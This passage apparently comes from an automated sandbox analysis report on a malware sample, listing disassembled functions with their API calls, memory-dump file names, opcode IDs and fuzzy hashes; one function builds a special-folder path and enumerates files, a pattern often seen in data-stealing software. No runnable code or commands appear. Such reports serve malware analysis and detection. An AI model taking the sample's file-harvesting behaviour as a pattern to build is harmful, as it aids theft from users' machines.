                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateLocalProcessTimewsprintf
                  • String ID:
                  • API String ID: 377395780-0
                  • Opcode ID: 585142c6d9c3f426cba56f1ebad3a4b1c7aa1c9727bd0f55592070574bc768ed
                  • Instruction ID: e90679d604acd28f882130a1afb1f65642d5d2e5dd11b70584e0495931bfd649
                  • Opcode Fuzzy Hash: 585142c6d9c3f426cba56f1ebad3a4b1c7aa1c9727bd0f55592070574bc768ed
                  • Instruction Fuzzy Hash: DD117CB2904158ABCB14DFD9DD84BBEB7F8FB4CB11F00411AF601A2280E3385950C7B5
                  Function 002BC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE
                  Download Yara Rule
                  APIs
                  • __getptd.LIBCMT ref: 002BC74E
                    • Part of subcall function 002BBF9F: __amsg_exit.LIBCMT ref: 002BBFAF
                  • __getptd.LIBCMT ref: 002BC765
                  • __amsg_exit.LIBCMT ref: 002BC773
                  • __updatetlocinfoEx_nolock.LIBCMT ref: 002BC797
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                  • String ID:
                  • API String ID: 300741435-0
                  • Opcode ID: 0cea6d2d13f4fdeb93f33b6c2b207412bb799bf8ea31964420c7067c06f04243
                  • Instruction ID: 1cef15d742741c0b71d2c35ff7e3c0884853f4e63c758f0e4a7dc8dfbdd7e170
                  • Opcode Fuzzy Hash: 0cea6d2d13f4fdeb93f33b6c2b207412bb799bf8ea31964420c7067c06f04243
                  • Instruction Fuzzy Hash: 84F024329343009BD722BFB89807BEE73A06F047E0F304109F014A61D2CFA45870AE46
                  Function 002B4F40 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                  Download Yara Rule
                  APIs
                    • Part of subcall function 002B8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 002B8E0B
                  • lstrcat.KERNEL32(?,00000000), ref: 002B4F7A
                  • lstrcat.KERNEL32(?,002C1070), ref: 002B4F97
                  • lstrcat.KERNEL32(?,00D58A08), ref: 002B4FAB
                  • lstrcat.KERNEL32(?,002C1074), ref: 002B4FBD
                    • Part of subcall function 002B4910: wsprintfA.USER32 ref: 002B492C
                    • Part of subcall function 002B4910: FindFirstFileA.KERNEL32(?,?), ref: 002B4943
                    • Part of subcall function 002B4910: StrCmpCA.SHLWAPI(?,002C0FDC), ref: 002B4971
                    • Part of subcall function 002B4910: StrCmpCA.SHLWAPI(?,002C0FE0), ref: 002B4987
                    • Part of subcall function 002B4910: FindNextFileA.KERNEL32(000000FF,?), ref: 002B4B7D
                    • Part of subcall function 002B4910: FindClose.KERNEL32(000000FF), ref: 002B4B92
                  Memory Dump Source
                  • Source File: 00000000.00000002.2223187392.00000000002A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002A0000, based on PE: true
                  • Associated: 00000000.00000002.2223169858.00000000002A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000351000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.000000000035D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.0000000000382000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223187392.00000000004EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.00000000004FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000068E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000762000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.0000000000787000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000078F000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223313164.000000000079C000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223528474.000000000079D000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223630158.0000000000938000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2223643656.0000000000939000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_2a0000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                  • String ID:
                  • API String ID: 2667927680-0
                  • Opcode ID: f09b13343b3660b8d483a6fa8573c67a3cb531a669f9b0d3dbff8a7128f644d6
                  • Instruction ID: 7ad0fc32ecabadd2b9fcc0021032773f7e4515da0e6648759d5e9f0a2c890702
                  • Opcode Fuzzy Hash: f09b13343b3660b8d483a6fa8573c67a3cb531a669f9b0d3dbff8a7128f644d6
                  • Instruction Fuzzy Hash: 3321AA7A910208A7C754FBB0DCC7EED337CAB55300F404558B65996182EE74AAF8CFA6